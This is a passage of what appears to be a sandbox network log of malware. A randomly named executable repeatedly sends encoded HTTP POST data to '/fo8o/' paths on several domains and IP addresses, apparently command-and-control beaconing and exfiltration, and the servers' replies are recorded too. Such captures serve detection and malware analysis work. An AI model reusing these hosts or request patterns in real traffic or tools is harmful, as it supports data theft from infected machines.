Jan 11, 2025 04:06:28.680357933 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 11 Jan 2025 03:06:28 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49715	85.159.66.93	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:06:41.882797003 CET	778	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6d 4f 72 5a 72 56 62 46 67 71 33 56 78 63 4f 51 38 59 49 74 35 50 32 63 47 44 43 50 6a 33 67 72 48 6b 72 34 47 4d 3d Data Ascii: 7Fp=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0mOrZrVbFgq3VxcOQ8YIt5P2cGDCPj3grHkr4GM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49716	85.159.66.93	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:06:44.423958063 CET	798	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 64 63 46 72 30 4b 55 71 49 78 6b 30 62 6d 52 59 7a 6d 53 71 4f 73 32 50 4f 75 4b 73 4d 4d 4a 7a 30 64 67 68 67 Data Ascii: 7Fp=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5ndcFr0KUqIxk0bmRYzmSqOs2POuKsMMJz0dghg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49717	85.159.66.93	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:06:47.081713915 CET	1815	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 37 43 70 51 55 37 78 45 6d 4b 4f 33 48 63 59 76 79 34 6c 69 45 47 48 36 48 62 46 6a 59 4a 63 65 4d 72 2b 51 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 39 38 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 6c [TRUNCATED] Data Ascii: 7Fp=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/7CpQU7xEmKO3HcYvy4liEGH6HbFjYJceMr+Q0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs98QIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBuORrSPOKduH55uS2VuHEswTtqhBHwv4C63V5L8iD6jh4S6IfuEsb550muWnceqjpZzyLMUjjSstzqUTEzcqCh3s0GygiIiGABXNndetPURp51YCM4BQrd4vU6zDj6ZBwMzEeksp+A5NScTgSWHw+ayhmDaNg+EJ403kuMWC0X/qCbL4XKoj+Wgnfwg+CX9Q70Ap4JjvUTYSz8DsPdH2QFrZPtYnFB2Ss7h9Q4/UgwPvaa3Wk/+1UJnYmUQOFr9/VYVEey20mWWfkfqjZG/V2carnYbPufkZzPkALwkc6/x4iC9pnI7C85OmIoeaiI3tRMm0MIjOaoF6gr/jLjeU6ni2osqdmtL83+Jwj62S8cEiNIo7OXMYmpNnfDLyxdcxrFVIx1rQK43FfeSQmEeaOSdn2lH3pYEKEfsk7dwSeIb1DpA/cxDI4pPvGEuUtJfs8tRkBN9dyWS7SbTpvIkNTKtqsXIedR6y3caJX05ou05OXbdLEr+2DafkuDfyYvlEyiR+oPTnyDEr87BJUlIm5myfGz/hCMaH8qAhMeedSacIbcG7+gK9ZeYt+UYSmUQN7j2tpb1ibWO5daleZ2Qo8FyUZ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49718	85.159.66.93	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:06:49.622123003 CET	516	OUT	GET /fo8o/?7Fp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==&HN4=EPU0u4nHA HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 11, 2025 04:07:50.315737963 CET	194	IN	HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49719	91.195.240.94	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:07:55.359352112 CET	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 74 77 71 66 4e 4d 51 31 79 63 59 32 64 72 47 6d 77 6a 2f 46 42 50 61 38 6b 49 4c 55 6e 58 68 58 54 42 65 30 50 30 3d Data Ascii: 7Fp=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8ptwqfNMQ1ycY2drGmwj/FBPa8kILUnXhXTBe0P0=
Jan 11, 2025 04:07:55.994306087 CET	707	IN	HTTP/1.1 405 Not Allowed date: Sat, 11 Jan 2025 03:07:55 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49720	91.195.240.94	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:07:57.927006006 CET	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 78 38 6e 67 39 52 51 4b 4a 4e 77 52 75 71 59 69 72 2b 5a 4c 76 35 44 44 4c 62 55 2f 55 34 52 42 43 41 4a 64 66 Data Ascii: 7Fp=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBnx8ng9RQKJNwRuqYir+ZLv5DDLbU/U4RBCAJdf
Jan 11, 2025 04:07:58.545303106 CET	707	IN	HTTP/1.1 405 Not Allowed date: Sat, 11 Jan 2025 03:07:58 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49721	91.195.240.94	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:00.463826895 CET	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 5a 41 33 54 6c 48 6f 6d 49 7a 6d 70 4b 79 68 36 33 62 53 5a 31 66 65 45 79 6a 2f 6e 5a 33 75 6d 6c 51 4e 56 52 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 2b 73 77 43 33 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 4a [TRUNCATED] Data Ascii: 7Fp=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gZA3TlHomIzmpKyh63bSZ1feEyj/nZ3umlQNVRehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK+swC3ayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdFN+HqOOHs4LSir46C20h2WaW7eC3QW4PogCzq1ABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvY/idMEQnuN84DrQkl9yEHr/QZAkU1YvAd6bcquPTPdS4DMq3WNT/pNuf48eWAphVo3frnIBE7Oe8D7pck3In9ALm9G+90KsSjAUeJtA7laQxkUenNErcll/4FAW2QzPEvIQLZ1bas+Tc/CwBBOKYVQyGBcSf4KEdXQBSQWLdD2CsRN4O+pTSZ8xUOyVuX2jzxm3v85LlKbFqo/3DNqMoOtLPSZdId5yGC9dSFkECsj6eUxEfV5Tr4QzrlJ/9T/Q9IIeKl+fkl6ne3H7WML89s6JOmIvv+994w9xh2nc2sPi0b/mkR4m4EOZDuIDVl7Ig1wyvt2mikh74AIquIkSSDykGjNs5hUjFC5y07fSK/YkfSaB9s9wv0JUa6Wmr9K096ZO+26sihRIE7NNYUmT1X9p0kYdhWt6HVofiWX/1/d/Wn4XzisvVv3sm2gR24jUNOheZ7WH5tC2h60lPsIbCr2v1bnl8wn/gesZL9q/Brl3FyJjJ3nKdoHP3bj+k8a9vGQzaMR8gZSLI60IIi [TRUNCATED]
Jan 11, 2025 04:08:01.106964111 CET	707	IN	HTTP/1.1 405 Not Allowed date: Sat, 11 Jan 2025 03:08:01 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49722	91.195.240.94	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
